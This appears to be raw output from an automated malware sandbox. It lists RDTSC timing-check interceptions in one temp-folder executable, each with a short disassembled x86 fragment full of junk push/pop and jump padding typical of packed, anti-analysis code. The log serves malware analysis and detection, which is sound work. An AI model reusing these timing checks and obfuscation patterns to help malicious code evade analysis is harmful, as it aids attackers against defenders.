Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17AAF second address: B17AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F1144C8B188h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov ecx, dword ptr [ebp+122D2924h] 0x00000027 push 00000004h 0x00000029 mov dword ptr [ebp+122D2571h], ecx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17AF1 second address: B17B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F114478E747h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17EE7 second address: B17EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B1833B second address: B1839F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F114478E73Ch 0x00000008 js 00007F114478E736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F114478E738h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov di, bx 0x00000030 lea eax, dword ptr [ebp+12477EABh] 0x00000036 mov edx, 76443AA4h 0x0000003b nop 0x0000003c ja 00007F114478E74Ch 0x00000042 push eax 0x00000043 pushad 0x00000044 push ebx 0x00000045 push edi 0x00000046 pop edi 0x00000047 pop ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b pop eax 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: ADEA31 second address: ADEA3D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1144C8B186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A138 second address: B4A13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A13D second address: B4A145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A145 second address: B4A149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A149 second address: B4A14D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A14D second address: B4A153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A3FF second address: B4A422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1144C8B186h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1144C8B194h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A422 second address: B4A456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E745h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F114478E748h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A456 second address: B4A484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007F1144C8B196h 0x0000000c pushad 0x0000000d jnc 00007F1144C8B186h 0x00000013 jns 00007F1144C8B186h 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4A8E2 second address: B4A90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F114478E736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F114478E73Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F114478E73Bh 0x00000019 je 00007F114478E736h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4EF92 second address: B4EF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B4EF96 second address: B4EFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F114478E73Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B51CBB second address: B51CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B51CBF second address: B51CCE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F114478E736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5646F second address: B56483 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1144C8B186h 0x00000008 jno 00007F1144C8B186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B56483 second address: B56487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B56623 second address: B5664D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B190h 0x00000009 pop eax 0x0000000a jmp 00007F1144C8B191h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5664D second address: B56651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B56651 second address: B56673 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F1144C8B197h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B56907 second address: B5690C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5D609 second address: B5D60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5D60D second address: B5D635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F114478E73Ah 0x0000000b jmp 00007F114478E745h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5D635 second address: B5D650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B195h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C3AF second address: B5C3B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C3B3 second address: B5C3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1144C8B18Bh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C3C6 second address: B5C3DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F114478E736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jns 00007F114478E758h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C6F1 second address: B5C6FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C6FB second address: B5C70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F114478E740h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5CA11 second address: B5CA1B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1144C8B186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C0C5 second address: B5C0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F114478E743h 0x0000000a jl 00007F114478E74Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C0E5 second address: B5C10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B18Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F1144C8B190h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5C10D second address: B5C11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jns 00007F114478E73Ah 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5CF50 second address: B5CF56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5CF56 second address: B5CF75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F114478E736h 0x00000009 jnl 00007F114478E736h 0x0000000f jmp 00007F114478E73Ch 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5CF75 second address: B5CF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B18Ah 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B5CF8D second address: B5CFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F114478E742h 0x0000000f jns 00007F114478E736h 0x00000015 js 00007F114478E736h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B615A3 second address: B615B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F1144C8B186h 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B60E5C second address: B60E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F114478E771h 0x0000000b jbe 00007F114478E749h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F114478E73Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B60E92 second address: B60E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B67995 second address: B67999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B67999 second address: B6799F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6799F second address: B679E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F114478E73Ch 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F114478E73Eh 0x00000014 jp 00007F114478E736h 0x0000001a jmp 00007F114478E73Bh 0x0000001f popad 0x00000020 jmp 00007F114478E73Ch 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B68094 second address: B680C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B193h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d jmp 00007F1144C8B196h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6B0A7 second address: B6B0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6B0AD second address: B6B0B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6B0B4 second address: B6B0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6B237 second address: B6B248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F1144C8B18Ch 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6B248 second address: B6B260 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c je 00007F114478E736h 0x00000012 popad 0x00000013 push edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B6B260 second address: B6B26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B715F6 second address: B7160B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F114478E73Bh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7028D second address: B70295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B70295 second address: B702A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B702A0 second address: B702A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17D88 second address: B17DA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B17EA9 second address: B17EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D3803h], eax 0x0000000c push 0000001Eh 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F1144C8B188h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jg 00007F1144C8B18Ch 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B70746 second address: B70761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B708A9 second address: B708BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1144C8B186h 0x00000008 jmp 00007F1144C8B18Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B708BD second address: B708F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E746h 0x00000007 jmp 00007F114478E744h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007F114478E748h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B712F4 second address: B712FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7AA70 second address: B7AA7A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F114478E736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7AA7A second address: B7AA85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F1144C8B186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7908E second address: B79092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7936D second address: B793B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1144C8B1B1h 0x0000000f jmp 00007F1144C8B194h 0x00000014 jmp 00007F1144C8B197h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B793B6 second address: B793C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F114478E742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B79699 second address: B796A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B18Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7A161 second address: B7A167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7A167 second address: B7A197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c jno 00007F1144C8B186h 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F1144C8B197h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7A197 second address: B7A19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: B7A6F5 second address: B7A72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1144C8B199h 0x00000009 jmp 00007F1144C8B18Ah 0x0000000e popad 0x0000000f jmp 00007F1144C8B18Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F1144C8B186h 0x0000001c rdtsc
